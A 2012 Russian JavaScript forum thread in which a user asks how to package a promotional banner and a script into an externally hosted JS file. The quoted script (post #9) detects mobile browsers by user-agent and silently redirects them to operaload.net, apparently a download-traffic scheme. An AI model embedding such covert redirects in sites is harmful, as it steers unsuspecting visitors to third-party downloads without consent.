Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 12.01.2012, 19:31
Новичок на форуме
Отправить личное сообщение для BEUJ Посмотреть профиль Найти все сообщения от BEUJ
 
Регистрация: 12.01.2012
Сообщений: 7

Добавление кода js в js файл
Здравствуйте, у меня возник вопрос. Можно ли добавить js код в js файл?
Ответить с цитированием
  #2 (permalink)  
Старый 12.01.2012, 19:33
Аватар для FINoM
Новичок
Отправить личное сообщение для FINoM Посмотреть профиль Найти все сообщения от FINoM
 
Регистрация: 05.09.2010
Сообщений: 2,298

Да, открыть JS файл и добавить JS код.
__________________
"Matreshka is fucking awesome" © чувак с Reddit
Matreshka.js - Три возможности
Ответить с цитированием
  #3 (permalink)  
Старый 12.01.2012, 19:36
Новичок на форуме
Отправить личное сообщение для BEUJ Посмотреть профиль Найти все сообщения от BEUJ
 
Регистрация: 12.01.2012
Сообщений: 7

А браузер будет воспринимать его?
Ответить с цитированием
  #4 (permalink)  
Старый 12.01.2012, 19:37
Аватар для FINoM
Новичок
Отправить личное сообщение для FINoM Посмотреть профиль Найти все сообщения от FINoM
 
Регистрация: 05.09.2010
Сообщений: 2,298

Сообщение от BEUJ
А браузер будет воспринимать его?
Не знаю, зависит от расположения Юпитера.
__________________
"Matreshka is fucking awesome" © чувак с Reddit
Matreshka.js - Три возможности
Ответить с цитированием
  #5 (permalink)  
Старый 12.01.2012, 19:44
Новичок на форуме
Отправить личное сообщение для BEUJ Посмотреть профиль Найти все сообщения от BEUJ
 
Регистрация: 12.01.2012
Сообщений: 7

Вы наверно не поняли и поэтому смеетесь. У меня есть файл, например hjk.js. В этот файл я хочу засунуть баннер с ссылкой на сайт + редикет на другой сайт через JS скрипт. А потом его вставить на сайт в виде <script type="text/javascript" src="http://jjj.ru/hjk.js"></script>. Собственно вопрос в том, получится ли у меня так сделать и будет ли он работать в браузере?
Ответить с цитированием
  #6 (permalink)  
Старый 12.01.2012, 19:53
Аватар для FINoM
Новичок
Отправить личное сообщение для FINoM Посмотреть профиль Найти все сообщения от FINoM
 
Регистрация: 05.09.2010
Сообщений: 2,298

Ну если всё правильно сделаете, то да. В чем проблема, я не могу понять.
__________________
"Matreshka is fucking awesome" © чувак с Reddit
Matreshka.js - Три возможности
Ответить с цитированием
  #7 (permalink)  
Старый 12.01.2012, 19:58
Новичок на форуме
Отправить личное сообщение для BEUJ Посмотреть профиль Найти все сообщения от BEUJ
 
Регистрация: 12.01.2012
Сообщений: 7

Сообщение от FINoM Посмотреть сообщение
Ну если всё правильно сделаете, то да. В чем проблема, я не могу понять.
Да в том, что не знаю как баннер туда вставить через JS
Ответить с цитированием
  #8 (permalink)  
Старый 12.01.2012, 20:03
Аватар для FINoM
Новичок
Отправить личное сообщение для FINoM Посмотреть профиль Найти все сообщения от FINoM
 
Регистрация: 05.09.2010
Сообщений: 2,298

Сообщение от BEUJ
Да в том, что не знаю как баннер туда вставить через JS
Сообщение от BEUJ
А браузер будет воспринимать его?
Вы уж определитесь с вопросом. Или хотите узнать, возможно ли это в принципе (я ответил "да") или хотите решить конкретную задачу. Во втором случае, опишите эту задачу, телепаты в отпуске.
__________________
"Matreshka is fucking awesome" © чувак с Reddit
Matreshka.js - Три возможности
Ответить с цитированием
  #9 (permalink)  
Старый 12.01.2012, 20:13
Новичок на форуме
Отправить личное сообщение для BEUJ Посмотреть профиль Найти все сообщения от BEUJ
 
Регистрация: 12.01.2012
Сообщений: 7

В общем мне надо что бы было так - в файле /promo.js разместить баннер /promo468x60.jpg с сылкой на http://promo64.ru/ дальше в этот файл мне нужно впихнуть скрипт
Цитата:
<script type="text/javascript">
<!--
if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk)/i)!==null){
window.location = "http://operaload.net/u/73";
}
//-->
</script>
ну и всё
Ответить с цитированием
  #10 (permalink)  
Старый 12.01.2012, 20:14
Новичок на форуме
Отправить личное сообщение для BEUJ Посмотреть профиль Найти все сообщения от BEUJ
 
Регистрация: 12.01.2012
Сообщений: 7

и нужно что бы это всё работало, и скрипт и баннер
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сохранение контента в файл через JS fdcore Общие вопросы Javascript 10 18.12.2014 15:23
Ищу приличный редактор кода под JS Universe Общие вопросы Javascript 28 30.10.2012 18:30
Добавление данных в xml файл Arka1m Элементы интерфейса 9 18.11.2011 10:44
Большой JS файл. Кэш IE6. deadpsh Общие вопросы Javascript 1 26.11.2008 23:38
Загрузка дополнительного js кода с сервера Anonymous2008 Общие вопросы Javascript 5 20.11.2008 12:33